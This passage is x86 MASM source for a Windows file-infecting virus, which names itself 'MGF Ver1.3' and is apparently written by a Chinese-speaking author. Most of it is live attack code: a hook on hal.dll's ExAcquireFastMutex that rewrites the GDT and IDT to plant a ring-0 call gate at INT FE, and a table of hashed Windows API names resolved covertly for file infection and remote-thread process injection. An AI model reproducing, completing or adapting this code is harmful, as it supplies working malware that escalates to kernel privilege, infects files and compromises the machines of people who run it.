pushad
mov ecx,_size
shr ecx,1
pushfd
xor edx,edx
mov esi,_lpaddr
.repeat
lodsw
adc dx,ax
.untilcxz
popfd
.if CARRY?
lodsb
mov ah,0
adc dx,ax
.endif
add edx,_size
mov [esp+1ch],edx
popad
ret
_CheckSum endp
_Str2Upper proc _lpString,_Size
pushad
mov esi,_lpString
mov edi,esi
mov ecx,_Size
.if ecx
.repeat
lodsb
.if al>=''a'' && al<=''z''
sub al,20h
.endif
stosb
.untilcxz
.endif
popad
ret
_Str2Upper endp
;hal.dll导出的ExAcquireFastMutex()的HOOK代码,用来建立INT FE陷阱门,建立SELECTOR=390H的0级32位代码段和一个特征码
ring0apistart:
pushfd
pushad
push ebp
sgdt fword ptr [esp-2]
pop ebx
mov edi,390h
.if dword ptr [ebx+edi+12]!=00cffb00h
lea edx,[ebx+edi+8]
mov byte ptr [edx],0c3h
mov dword ptr [ebx+edi],0000ffffh
mov dword ptr [ebx+edi+4],00cf9b00h
mov byte ptr [ebx+edi+8],0c3h
mov dword ptr [ebx+edi+12],00cffb00h
push ebp
sidt fword ptr [esp-2]
pop ebx
mov esi,0feh*8
mov dword ptr [ebx+esi],edx
mov dword ptr [ebx+esi+4],edx
mov dword ptr [ebx+esi+2],0ef000390h
.endif
popad
popfd
db 0e9h ;JMP ExAcquireFastMutex()指令,下面的地址差要随机计算后填入
dd 0
ring0apiend:
;WIN API的自定义编码表
FunctionNameTab:
szCreateProcessW dd 074D9F4C0h
szCreateFileW dd 01479946Fh
szGetFileAttributesW dd 004788654h
szSetFileAttributesW dd 004788660h
szCreateFileMappingW dd 0E3486339h
szMapViewOfFile dd 0D444401Dh
szUnmapViewOfFile dd 0A6131C00h
szGetFileSize dd 01E92925Ch
szGetFileTime dd 01286865Dh
szSetFileTime dd 012868669h
szGetFileType dd 02599996Dh
szCloseHandle dd 027969D71h
szGetSystemDirectoryW dd 0980C19E1h
szCreateProcessInternalW dd 0B51A3504h
szSleep dd 0D63B3724h
szCreateToolhelp32Snapshot dd 03EA3A16Dh
szProcess32First dd 01F8E8C65h
szProcess32Next dd 0B62522F7h
szOpenProcess dd 050B5B28Bh
szVirtualAllocEx dd 062D4C5D2h
szWriteProcessMemory dd 037A09978h
szCreateRemoteThread dd 004697753h
szVirtualProtect dd 09C0E02F1h
szCreateMutexA dd 091F727EFh
szGetProcAddress dd 05ED2C494h
dd 0
FunctionAddressTab:
dwCreateProcessW dd 0
dwCreateFileW dd 0
dwGetFileAttributesW dd 0
dwSetFileAttributesW dd 0
dwCreateFileMappingW dd 0
dwMapViewOfFile dd 0
dwUnmapViewOfFile dd 0
dwGetFileSize dd 0
dwGetFileTime dd 0
dwSetFileTime dd 0
dwGetFileType dd 0
dwCloseHandle dd 0
dwGetSystemDirectoryW dd 0
dwCreateProcessInternalW dd 0
dwSleep dd 0
dwCreateToolhelp32Snapshot dd 0
dwProcess32First dd 0
dwProcess32Next dd 0
dwOpenProcess dd 0
dwVirtualAllocEx dd 0
dwWriteProcessMemory dd 0
dwCreateRemoteThread dd 0
dwVirtualProtect dd 0
dwCreateMutexA dd 0
dwGetProcAddress dd 0
dwGetLastError dd 0
szGetLastError db ''GetLastError'',0
szVersion db ''MGF Ver1.3'',0
VirusEnd:
invoke ExitProcess,0
end VirusStart
